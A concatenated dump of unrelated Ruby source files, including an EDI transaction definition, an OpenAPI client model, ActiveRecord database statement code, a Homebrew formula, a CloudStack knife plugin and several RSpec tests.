b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, "")))),
d::TableDef.header("Detail",
d::LoopDef.build("LIN - Detail 1", d::RepeatCount.unbounded,
b::Segment(10, s::LIN, "Warehouse Shipment Identification - Detail 1", r::Required, d::RepeatCount.bounded(1),
b::Element(e::Required, "Reporting Code", b::Values("F")),
b::Element(e::Required, "Depositor Order Number"),
b::Element(e::Situational, "Date"),
b::Element(e::Required, "Shipment Identification Number"),
b::Element(e::Situational, "Agent Shipment ID Number"),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, "")),
b::Segment(20, s::UIT, "Unit Detail - Detail 1", r::Situational, d::RepeatCount.bounded(1),
b::Element(e::Required, "Composite Unit of Measure",
b::Element(e::Required, "Unit or Basis for Measurement Code", b::Values("PC")),
b::Element(e::NotUsed, "Exponent"),
b::Element(e::NotUsed, "Multiplier"),
b::Element(e::Situational, "Unit or Basis for Measurement Code", b::Values("LB")),
b::Element(e::NotUsed, "Exponent"),
b::Element(e::Situational, "Multiplier")),
b::Element(e::Situational, "Unit Price")),
b::Segment(80, s::PID, "Product/Item Description - Detail 1", r::Situational, d::RepeatCount.bounded(1),
b::Element(e::Required, "Item Description Type", b::Values("F")),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::Required, "Description"),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, "")),
d::LoopDef.build("N1 #1", d::RepeatCount.bounded(1),
b::Segment(320, s:: N1, "Name - Detail 1", r::Situational, d::RepeatCount.bounded(1),
b::Element(e::Required, "Entity Identifier Code", b::Values("ST", "SF")),
b::Element(e::Situational, "Name"),
b::Element(e::Situational, "Identification Code Qualifier", b::Values("91")),
b::Element(e::Situational, "Identification Code"),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""))),
d::LoopDef.build("SDP #1", d::RepeatCount.bounded(1),
b::Segment(450, s::SDP, "Ship/Delivery Pattern - Detail 1", r::Situational, d::RepeatCount.bounded(1),
b::Element(e::Required, "Ship/Delivery or Calendar Pattern Code", b::Values("Y")),
b::Element(e::Required, "Ship/Delivery Pattern Time Code", b::Values("Y"))),
b::Segment(460, s::FST, "Forecast Schedule - Detail 1", r::Situational, d::RepeatCount.bounded(6),
b::Element(e::Required, "Quantity"),
b::Element(e::Required, "Forecast Qualifier", b::Values("C", "D")),
b::Element(e::Required, "Forecast Timing Qualifier", b::Values("F")),
b::Element(e::Required, "Date"),
b::Element(e::Situational, "Date"),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::Situational, "Reference Identification Qualifier"),
b::Element(e::Situational, "Reference Identification"))),
d::LoopDef.build("SHP #1", d::RepeatCount.bounded(1),
b::Segment(470, s::SHP, "Shipped/Received Information - Detail 1", r::Situational, d::RepeatCount.bounded(1),
b::Element(e::Situational, "Quantity Qualifier", b::Values("02")),
b::Element(e::Situational, "Quantity"),
b::Element(e::Situational, "Date/Time Qualifier", b::Values("011")),
b::Element(e::Situational, "Date"))))),
d::TableDef.header("Summary",
b::Segment(10, s::CTT, "Transaction Totals", r::Situational, d::RepeatCount.bounded(1),
b::Element(e::Required, "Number of Units Shipped"),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, "")),
b::Segment(30, s::SE, "Transaction Set Trailer", r::Required, d::RepeatCount.bounded(1),
b::Element(e::Required, "Number of Included Segments"),
b::Element(e::Required, "Transaction Set Control Number"))))
end
end
end
end
| 57.833333 | 125 | 0.495677 |
f7d016f9fc05ca84c0b7d306bb6ab68337c9cc1a | 95 | # desc "Explaining what the task does"
# task :heerschable_table do
# # Task goes here
# end
| 19 | 38 | 0.705263 |
8765bc74464977f7ba2b8a53690ce313d6264c83 | 5,688 | =begin
#Topological Inventory
#Topological Inventory
OpenAPI spec version: 0.1.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 3.3.4
=end
require 'date'
module TopologicalInventoryApiClient
class ServiceInstancesCollection
attr_accessor :meta
attr_accessor :links
attr_accessor :data
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'meta' => :'meta',
:'links' => :'links',
:'data' => :'data'
}
end
# Attribute type mapping.
def self.openapi_types
{
:'meta' => :'CollectionMetadata',
:'links' => :'CollectionLinks',
:'data' => :'Array<ServiceInstance>'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'meta')
self.meta = attributes[:'meta']
end
if attributes.has_key?(:'links')
self.links = attributes[:'links']
end
if attributes.has_key?(:'data')
if (value = attributes[:'data']).is_a?(Array)
self.data = value
end
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
meta == o.meta &&
links == o.links &&
data == o.data
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[meta, links, data].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = TopologicalInventoryApiClient.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 27.882353 | 107 | 0.608122 |
1cd26cb2bfef0eb843e401b3a809157c199cb1fc | 862 | Pod::Spec.new do |s|
s.name = 'DBAttachmentPickerController'
s.version = '1.1.4'
s.authors = { 'Denis Bogatyrev' => '[email protected]' }
s.summary = 'This powerful component allows to select different types of files from different sources on your device'
s.homepage = 'https://github.com/d0ping/DBAttachmentPickerController'
s.license = { :type => 'MIT' }
s.requires_arc = true
s.platform = :ios, '8.0'
s.source = { :git => 'https://github.com/d0ping/DBAttachmentPickerController.git', :tag => "#{s.version}" }
s.source_files = 'Source/**/*.{h,m}'
s.resources = 'Source/**/*.{xib}'
s.resource_bundle = { 'DBAttachmentPickerController' => ['Source/Localization/*.lproj'] }
s.public_header_files = 'Source/**/*.h'
s.dependency 'BEMCheckBox', '~> 1.4.1'
s.dependency 'NYTPhotoViewer'
end
| 45.368421 | 124 | 0.648492 |
620d4918a71c10deea9818a9294ed0e637ba5bd8 | 605 | # frozen_string_literal: true
class ReportManager
def initialize(fastlane:, output_directory:)
@fastlane = fastlane
@output_directory = output_directory
end
def produce_report(scheme:, workspace:, report_targets:, test_output_directory:)
xccov_file_direct_path = "#{test_output_directory}/#{scheme}.xcresult"
@fastlane.xcov(
scheme: scheme,
workspace: workspace,
output_directory: @output_directory,
xccov_file_direct_path: xccov_file_direct_path,
include_targets: report_targets,
markdown_report: true,
html_report: false
)
end
end
| 27.5 | 82 | 0.732231 |
1d36c3c8b115ec7437de103ea61d9d2f11af8492 | 18,994 | # frozen_string_literal: true
module ActiveRecord
module ConnectionAdapters # :nodoc:
module DatabaseStatements
def initialize
super
reset_transaction
end
# Converts an arel AST to SQL
def to_sql(arel_or_sql_string, binds = [])
sql, _ = to_sql_and_binds(arel_or_sql_string, binds)
sql
end
def to_sql_and_binds(arel_or_sql_string, binds = []) # :nodoc:
if arel_or_sql_string.respond_to?(:ast)
unless binds.empty?
raise "Passing bind parameters with an arel AST is forbidden. " \
"The values must be stored on the AST directly"
end
sql, binds = visitor.accept(arel_or_sql_string.ast, collector).value
[sql.freeze, binds || []]
else
[arel_or_sql_string.dup.freeze, binds]
end
end
private :to_sql_and_binds
# This is used in the StatementCache object. It returns an object that
# can be used to query the database repeatedly.
def cacheable_query(klass, arel) # :nodoc:
if prepared_statements
sql, binds = visitor.accept(arel.ast, collector).value
query = klass.query(sql)
else
collector = PartialQueryCollector.new
parts, binds = visitor.accept(arel.ast, collector).value
query = klass.partial_query(parts)
end
[query, binds]
end
# Returns an ActiveRecord::Result instance.
def select_all(arel, name = nil, binds = [], preparable: nil)
arel = arel_from_relation(arel)
sql, binds = to_sql_and_binds(arel, binds)
if !prepared_statements || (arel.is_a?(String) && preparable.nil?)
preparable = false
else
preparable = visitor.preparable
end
if prepared_statements && preparable
select_prepared(sql, name, binds)
else
select(sql, name, binds)
end
end
# Returns a record hash with the column names as keys and column values
# as values.
def select_one(arel, name = nil, binds = [])
select_all(arel, name, binds).first
end
# Returns a single value from a record
def select_value(arel, name = nil, binds = [])
single_value_from_rows(select_rows(arel, name, binds))
end
# Returns an array of the values of the first column in a select:
# select_values("SELECT id FROM companies LIMIT 3") => [1,2,3]
def select_values(arel, name = nil, binds = [])
select_rows(arel, name, binds).map(&:first)
end
# Returns an array of arrays containing the field values.
# Order is the same as that returned by +columns+.
def select_rows(arel, name = nil, binds = [])
select_all(arel, name, binds).rows
end
def query_value(sql, name = nil) # :nodoc:
single_value_from_rows(query(sql, name))
end
def query_values(sql, name = nil) # :nodoc:
query(sql, name).map(&:first)
end
def query(sql, name = nil) # :nodoc:
exec_query(sql, name).rows
end
# Executes the SQL statement in the context of this connection and returns
# the raw result from the connection adapter.
# Note: depending on your database connector, the result returned by this
# method may be manually memory managed. Consider using the exec_query
# wrapper instead.
def execute(sql, name = nil)
raise NotImplementedError
end
# Executes +sql+ statement in the context of this connection using
# +binds+ as the bind substitutes. +name+ is logged along with
# the executed +sql+ statement.
def exec_query(sql, name = "SQL", binds = [], prepare: false)
raise NotImplementedError
end
# Executes insert +sql+ statement in the context of this connection using
# +binds+ as the bind substitutes. +name+ is logged along with
# the executed +sql+ statement.
def exec_insert(sql, name = nil, binds = [], pk = nil, sequence_name = nil)
sql, binds = sql_for_insert(sql, pk, nil, sequence_name, binds)
exec_query(sql, name, binds)
end
# Executes delete +sql+ statement in the context of this connection using
# +binds+ as the bind substitutes. +name+ is logged along with
# the executed +sql+ statement.
def exec_delete(sql, name = nil, binds = [])
exec_query(sql, name, binds)
end
# Executes the truncate statement.
def truncate(table_name, name = nil)
raise NotImplementedError
end
# Executes update +sql+ statement in the context of this connection using
# +binds+ as the bind substitutes. +name+ is logged along with
# the executed +sql+ statement.
def exec_update(sql, name = nil, binds = [])
exec_query(sql, name, binds)
end
# Executes an INSERT query and returns the new record's ID
#
# +id_value+ will be returned unless the value is +nil+, in
# which case the database will attempt to calculate the last inserted
# id and return that value.
#
# If the next id was calculated in advance (as in Oracle), it should be
# passed in as +id_value+.
def insert(arel, name = nil, pk = nil, id_value = nil, sequence_name = nil, binds = [])
sql, binds = to_sql_and_binds(arel, binds)
value = exec_insert(sql, name, binds, pk, sequence_name)
id_value || last_inserted_id(value)
end
alias create insert
# Executes the update statement and returns the number of rows affected.
def update(arel, name = nil, binds = [])
sql, binds = to_sql_and_binds(arel, binds)
exec_update(sql, name, binds)
end
# Executes the delete statement and returns the number of rows affected.
def delete(arel, name = nil, binds = [])
sql, binds = to_sql_and_binds(arel, binds)
exec_delete(sql, name, binds)
end
# Returns +true+ when the connection adapter supports prepared statement
# caching, otherwise returns +false+
def supports_statement_cache? # :nodoc:
true
end
deprecate :supports_statement_cache?
# Runs the given block in a database transaction, and returns the result
# of the block.
#
# == Nested transactions support
#
# Most databases don't support true nested transactions. At the time of
# writing, the only database that supports true nested transactions that
# we're aware of, is MS-SQL.
#
# In order to get around this problem, #transaction will emulate the effect
# of nested transactions, by using savepoints:
# https://dev.mysql.com/doc/refman/5.7/en/savepoint.html
# Savepoints are supported by MySQL and PostgreSQL. SQLite3 version >= '3.6.8'
# supports savepoints.
#
# It is safe to call this method if a database transaction is already open,
# i.e. if #transaction is called within another #transaction block. In case
# of a nested call, #transaction will behave as follows:
#
# - The block will be run without doing anything. All database statements
# that happen within the block are effectively appended to the already
# open database transaction.
# - However, if +:requires_new+ is set, the block will be wrapped in a
# database savepoint acting as a sub-transaction.
#
# === Caveats
#
# MySQL doesn't support DDL transactions. If you perform a DDL operation,
# then any created savepoints will be automatically released. For example,
# if you've created a savepoint, then you execute a CREATE TABLE statement,
# then the savepoint that was created will be automatically released.
#
# This means that, on MySQL, you shouldn't execute DDL operations inside
# a #transaction call that you know might create a savepoint. Otherwise,
# #transaction will raise exceptions when it tries to release the
# already-automatically-released savepoints:
#
# Model.connection.transaction do # BEGIN
# Model.connection.transaction(requires_new: true) do # CREATE SAVEPOINT active_record_1
# Model.connection.create_table(...)
# # active_record_1 now automatically released
# end # RELEASE SAVEPOINT active_record_1 <--- BOOM! database error!
# end
#
# == Transaction isolation
#
# If your database supports setting the isolation level for a transaction, you can set
# it like so:
#
# Post.transaction(isolation: :serializable) do
# # ...
# end
#
# Valid isolation levels are:
#
# * <tt>:read_uncommitted</tt>
# * <tt>:read_committed</tt>
# * <tt>:repeatable_read</tt>
# * <tt>:serializable</tt>
#
# You should consult the documentation for your database to understand the
# semantics of these different levels:
#
# * https://www.postgresql.org/docs/current/static/transaction-iso.html
# * https://dev.mysql.com/doc/refman/5.7/en/set-transaction.html
#
# An ActiveRecord::TransactionIsolationError will be raised if:
#
# * The adapter does not support setting the isolation level
# * You are joining an existing open transaction
# * You are creating a nested (savepoint) transaction
#
# The mysql2 and postgresql adapters support setting the transaction
# isolation level.
def transaction(requires_new: nil, isolation: nil, joinable: true)
if !requires_new && current_transaction.joinable?
if isolation
raise ActiveRecord::TransactionIsolationError, "cannot set isolation when joining a transaction"
end
yield
else
transaction_manager.within_new_transaction(isolation: isolation, joinable: joinable) { yield }
end
rescue ActiveRecord::Rollback
# rollbacks are silently swallowed
end
attr_reader :transaction_manager #:nodoc:
delegate :within_new_transaction, :open_transactions, :current_transaction, :begin_transaction,
:commit_transaction, :rollback_transaction, :materialize_transactions,
:disable_lazy_transactions!, :enable_lazy_transactions!, to: :transaction_manager
def transaction_open?
current_transaction.open?
end
def reset_transaction #:nodoc:
@transaction_manager = ConnectionAdapters::TransactionManager.new(self)
end
# Register a record with the current transaction so that its after_commit and after_rollback callbacks
# can be called.
def add_transaction_record(record)
current_transaction.add_record(record)
end
def transaction_state
current_transaction.state
end
# Begins the transaction (and turns off auto-committing).
def begin_db_transaction() end
def transaction_isolation_levels
{
read_uncommitted: "READ UNCOMMITTED",
read_committed: "READ COMMITTED",
repeatable_read: "REPEATABLE READ",
serializable: "SERIALIZABLE"
}
end
# Begins the transaction with the isolation level set. Raises an error by
# default; adapters that support setting the isolation level should implement
# this method.
def begin_isolated_db_transaction(isolation)
raise ActiveRecord::TransactionIsolationError, "adapter does not support setting transaction isolation"
end
# Commits the transaction (and turns on auto-committing).
def commit_db_transaction() end
# Rolls back the transaction (and turns on auto-committing). Must be
# done if the transaction block raises an exception or returns false.
def rollback_db_transaction
exec_rollback_db_transaction
end
def exec_rollback_db_transaction() end #:nodoc:
def rollback_to_savepoint(name = nil)
exec_rollback_to_savepoint(name)
end
def default_sequence_name(table, column)
nil
end
# Set the sequence to the max value of the table's column.
def reset_sequence!(table, column, sequence = nil)
# Do nothing by default. Implement for PostgreSQL, Oracle, ...
end
# Inserts the given fixture into the table. Overridden in adapters that require
# something beyond a simple insert (eg. Oracle).
# Most of adapters should implement `insert_fixtures` that leverages bulk SQL insert.
# We keep this method to provide fallback
# for databases like sqlite that do not support bulk inserts.
def insert_fixture(fixture, table_name)
fixture = fixture.stringify_keys
columns = schema_cache.columns_hash(table_name)
binds = fixture.map do |name, value|
if column = columns[name]
type = lookup_cast_type_from_column(column)
Relation::QueryAttribute.new(name, value, type)
else
raise Fixture::FixtureError, %(table "#{table_name}" has no column named #{name.inspect}.)
end
end
table = Arel::Table.new(table_name)
values = binds.map do |bind|
value = with_yaml_fallback(bind.value_for_database)
[table[bind.name], value]
end
manager = Arel::InsertManager.new
manager.into(table)
manager.insert(values)
execute manager.to_sql, "Fixture Insert"
end
# Inserts a set of fixtures into the table. Overridden in adapters that require
# something beyond a simple insert (eg. Oracle).
def insert_fixtures(fixtures, table_name)
ActiveSupport::Deprecation.warn(<<-MSG.squish)
`insert_fixtures` is deprecated and will be removed in the next version of Rails.
Consider using `insert_fixtures_set` for performance improvement.
MSG
return if fixtures.empty?
execute(build_fixture_sql(fixtures, table_name), "Fixtures Insert")
end
def insert_fixtures_set(fixture_set, tables_to_delete = [])
fixture_inserts = fixture_set.map do |table_name, fixtures|
next if fixtures.empty?
build_fixture_sql(fixtures, table_name)
end.compact
table_deletes = tables_to_delete.map { |table| "DELETE FROM #{quote_table_name table}".dup }
total_sql = Array.wrap(combine_multi_statements(table_deletes + fixture_inserts))
disable_referential_integrity do
transaction(requires_new: true) do
total_sql.each do |sql|
execute sql, "Fixtures Load"
yield if block_given?
end
end
end
end
def empty_insert_statement_value(primary_key = nil)
"DEFAULT VALUES"
end
# Sanitizes the given LIMIT parameter in order to prevent SQL injection.
#
# The +limit+ may be anything that can evaluate to a string via #to_s. It
# should look like an integer, or an Arel SQL literal.
#
# Returns Integer and Arel::Nodes::SqlLiteral limits as is.
def sanitize_limit(limit)
if limit.is_a?(Integer) || limit.is_a?(Arel::Nodes::SqlLiteral)
limit
else
Integer(limit)
end
end
# The default strategy for an UPDATE with joins is to use a subquery. This doesn't work
# on MySQL (even when aliasing the tables), but MySQL allows using JOIN directly in
# an UPDATE statement, so in the MySQL adapters we redefine this to do that.
def join_to_update(update, select, key) # :nodoc:
subselect = subquery_for(key, select)
update.where key.in(subselect)
end
alias join_to_delete join_to_update
private
def default_insert_value(column)
Arel.sql("DEFAULT")
end
def build_fixture_sql(fixtures, table_name)
columns = schema_cache.columns_hash(table_name)
values = fixtures.map do |fixture|
fixture = fixture.stringify_keys
unknown_columns = fixture.keys - columns.keys
if unknown_columns.any?
raise Fixture::FixtureError, %(table "#{table_name}" has no columns named #{unknown_columns.map(&:inspect).join(', ')}.)
end
columns.map do |name, column|
if fixture.key?(name)
type = lookup_cast_type_from_column(column)
bind = Relation::QueryAttribute.new(name, fixture[name], type)
with_yaml_fallback(bind.value_for_database)
else
default_insert_value(column)
end
end
end
table = Arel::Table.new(table_name)
manager = Arel::InsertManager.new
manager.into(table)
columns.each_key { |column| manager.columns << table[column] }
manager.values = manager.create_values_list(values)
manager.to_sql
end
def combine_multi_statements(total_sql)
total_sql.join(";\n")
end
# Returns a subquery for the given key using the join information.
def subquery_for(key, select)
subselect = select.clone
subselect.projections = [key]
subselect
end
# Returns an ActiveRecord::Result instance.
def select(sql, name = nil, binds = [])
exec_query(sql, name, binds, prepare: false)
end
def select_prepared(sql, name = nil, binds = [])
exec_query(sql, name, binds, prepare: true)
end
def sql_for_insert(sql, pk, id_value, sequence_name, binds)
[sql, binds]
end
def last_inserted_id(result)
single_value_from_rows(result.rows)
end
def single_value_from_rows(rows)
row = rows.first
row && row.first
end
def arel_from_relation(relation)
if relation.is_a?(Relation)
relation.arel
else
relation
end
end
# Fixture value is quoted by Arel, however scalar values
# are not quotable. In this case we want to convert
# the column value to YAML.
def with_yaml_fallback(value)
if value.is_a?(Hash) || value.is_a?(Array)
YAML.dump(value)
else
value
end
end
class PartialQueryCollector
def initialize
@parts = []
@binds = []
end
def <<(str)
@parts << str
self
end
def add_bind(obj)
@binds << obj
@parts << Arel::Nodes::BindParam.new(1)
self
end
def value
[@parts, @binds]
end
end
end
end
end
| 35.837736 | 134 | 0.630883 |
38549fa2eae4e3d57119c58a038629fad5e37d73 | 403 | # -*- coding: utf-8 -*-
# =Batch Manager=
# =created_at: <%= Time.now.strftime "%Y-%m-%d %H:%M:%S" %>
# =times_limit: 1
ActiveRecord::Base.transaction do
# Code at here will rollback when dry run.
# @wet will be true when -f option passed.
if @wet
BatchManager.logger.info "Wet run completed!"
else
BatchManager.logger.warn "Rolling back."
raise ActiveRecord::Rollback
end
end
| 22.388889 | 60 | 0.66005 |
38821049aee619c0b7603e12ce9a42bb752ff2cd | 1,280 | class Cromwell < Formula
desc "Workflow Execution Engine using Workflow Description Language"
homepage "https://github.com/broadinstitute/cromwell"
url "https://github.com/broadinstitute/cromwell/releases/download/30.2/cromwell-30.2.jar"
sha256 "dfdc60966807899f6a1d82c6929e26f66aecfdce0f556b8f1918a58f8e523299"
head do
url "https://github.com/broadinstitute/cromwell.git"
depends_on "sbt" => :build
end
bottle :unneeded
depends_on :java => "1.8+"
depends_on "akka"
def install
if build.head?
system "sbt", "assembly"
libexec.install Dir["target/scala-*/cromwell-*.jar"][0]
else
libexec.install Dir["cromwell-*.jar"][0]
end
bin.write_jar_script Dir[libexec/"cromwell-*.jar"][0], "cromwell"
end
test do
(testpath/"hello.wdl").write <<-EOS
task hello {
String name
command {
echo 'hello ${name}!'
}
output {
File response = stdout()
}
}
workflow test {
call hello
}
EOS
(testpath/"hello.json").write <<-EOS
{
"test.hello.name": "world"
}
EOS
result = shell_output("#{bin}/cromwell run --inputs hello.json hello.wdl")
assert_match "test.hello.response", result
end
end
| 22.857143 | 91 | 0.627344 |
08259f890b6273ef0c20a76ecf904019dec12825 | 3,999 | #
# Author:: Sander Botman (<[email protected]>)
# Copyright:: Copyright (c) 2013 Sander Botman.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'chef/knife/cs_base'
module KnifeCloudstack
class CsForwardruleCreate < Chef::Knife
include Chef::Knife::KnifeCloudstackBase
deps do
require 'knife-cloudstack/connection'
Chef::Knife.load_deps
end
banner "knife cs forwardrule create hostname 8080:8090:TCP"
option :openfirewall,
:long => "--openfirewall",
:description => "Add rule also to firewall",
:boolean => true
option :syncrequest,
:long => "--sync",
:description => "Execute command as sync request",
:boolean => true
def run
hostname = @name_args.shift
unless /^[a-zA-Z0-9][a-zA-Z0-9-]*$/.match hostname then
ui.error "Invalid hostname. Please specify a short hostname, not an fqdn (e.g. 'myhost' instead of 'myhost.domain.com')."
exit 1
end
params = {}
locate_config_value(:openfirewall) ? params['openfirewall'] = 'true' : params['openfirewall'] = 'false'
# Lookup all server objects.
params_for_list_object = { 'command' => 'listVirtualMachines' }
connection_result = connection.list_object(params_for_list_object, "virtualmachine")
# Lookup the hostname in the connection result
server = {}
connection_result.map { |n| server = n if n['name'].upcase == hostname.upcase }
if server['name'].nil?
ui.error "Cannot find hostname: #{hostname}."
exit 1
end
# Lookup the public ip address of the server
server_public_address = connection.get_server_public_ip(server)
ip_address = connection.get_public_ip_address(server_public_address)
if ip_address.nil? || ip_address['id'].nil?
ui.error "Cannot find public ip address for hostname: #{hostname}."
exit 1
end
@name_args.each do |rule|
create_port_forwarding_rule(ip_address, server['id'], rule, connection, params)
end
end
def create_port_forwarding_rule(ip_address, server_id, rule, connection, other_params)
args = rule.split(':')
public_port = args[0]
private_port = args[1] || args[0]
protocol = args[2] || "TCP"
params = {
'ipaddressId' => ip_address['id'],
'protocol' => protocol
}
if ip_address['isstaticnat'] == 'true'
other_params['command'] = 'createIpForwardingRule'
other_params['startport'] = public_port
other_params['endport'] = public_port
Chef::Log.debug("Creating IP Forwarding Rule for
#{ip_address['ipaddress']} with protocol: #{protocol}, public port: #{public_port}")
else
other_params['command'] = 'createPortForwardingRule'
other_params['privatePort'] = private_port
other_params['publicPort'] = public_port
other_params['virtualMachineId'] = server_id
Chef::Log.debug("Creating Port Forwarding Rule for #{ip_address['id']} with protocol: #{protocol},
public port: #{public_port} and private port: #{private_port} and server: #{server_id}")
end
locate_config_value(:syncrequest) ? result = connection.send_request(params.merge(other_params)) : result = connection.send_async_request(params.merge(other_params))
Chef::Log.debug("AsyncJobResult: #{result}")
end
end
end
| 35.705357 | 171 | 0.664166 |
bbc2f595baef7d3e562de739e93a64923819644a | 1,734 | require 'rails_helper'
require 'sorbet-rails/model_rbi_formatter'
RSpec.describe SorbetRails::ModelRbiFormatter do
before(:all) do
SorbetRails::Utils.rails_eager_load_all!
end
it 'does not throw an error when given an abstract class' do
formatter = SorbetRails::ModelRbiFormatter.new(Potion, Set.new(['Potion']))
expect_match_file(
formatter.generate_rbi,
'expected_potion.rbi',
)
end
it 'generates correct rbi file for Wizard' do
class_set = Set.new(['Wizard', 'Wand', 'SpellBook'])
if Object.const_defined?('ActiveStorage::Attachment')
class_set << 'ActiveStorage::Attachment'
end
if Object.const_defined?('ActiveStorage::Blob')
class_set << 'ActiveStorage::Blob'
end
formatter = SorbetRails::ModelRbiFormatter.new(Wizard, class_set)
expect_match_file(
formatter.generate_rbi,
'expected_wizard.rbi',
)
end
it 'generates strict belongs_to and generate overridden methods' do
formatter = SorbetRails::ModelRbiFormatter.new(Wand, Set.new(['Wizard', 'Wand', 'SpellBook']))
expect_match_file(
formatter.generate_rbi,
'expected_wand.rbi',
)
end
context 'there is a hidden model' do
it 'fallbacks to use ActiveRecord::Relation' do
class_set = Set.new(['Wizard', 'Wand'])
if Object.const_defined?('ActiveStorage::Attachment')
class_set << 'ActiveStorage::Attachment'
end
if Object.const_defined?('ActiveStorage::Blob')
class_set << 'ActiveStorage::Blob'
end
formatter = SorbetRails::ModelRbiFormatter.new(Wizard, class_set)
expect_match_file(
formatter.generate_rbi,
'expected_wizard_wo_spellbook.rbi',
)
end
end
end
| 30.421053 | 98 | 0.689735 |
d5aef8d7c5619b1dd8269f3c11a401651ce05831 | 568 | # frozen_string_literal: true
RSpec.describe Bootpay::Api do
it "cancel payment" do
puts "cancel payment"
api = Bootpay::Api.new(
application_id: '5b8f6a4d396fa665fdc2b5ea',
private_key: 'rm6EYECr6aroQVG2ntW0A6LpWnkTgP4uQ3H18sDDUYw=',
)
if api.request_access_token.success?
response = api.cancel_payment(
receipt_id: "612df0250d681b001de61de6",
# cancel_price: 200,
cancel_username: 'test',
cancel_message: 'test'
)
puts response.data.to_json
end
end
end
| 27.047619 | 69 | 0.646127 |
edf5aa2fc90d57f8c0b40d04f1b9259490ed39fe | 276 | class CreateComments < ActiveRecord::Migration[6.0]
def change
create_table :comments do |t|
t.references :tutorial, null: false, foreign_key: true
t.references :user, null: false, foreign_key: true
t.text :review
t.timestamps
end
end
end
| 23 | 60 | 0.677536 |
7a1c0e49477d9d55e6efa7d8677794368ac94217 | 9,585 | #! /usr/bin/env ruby
require 'spec_helper'
require 'facter/util/loader'
describe Facter::Util::Loader do
before :each do
Facter::Util::Loader.any_instance.unstub(:load_all)
end
def loader_from(places)
env = places[:env] || {}
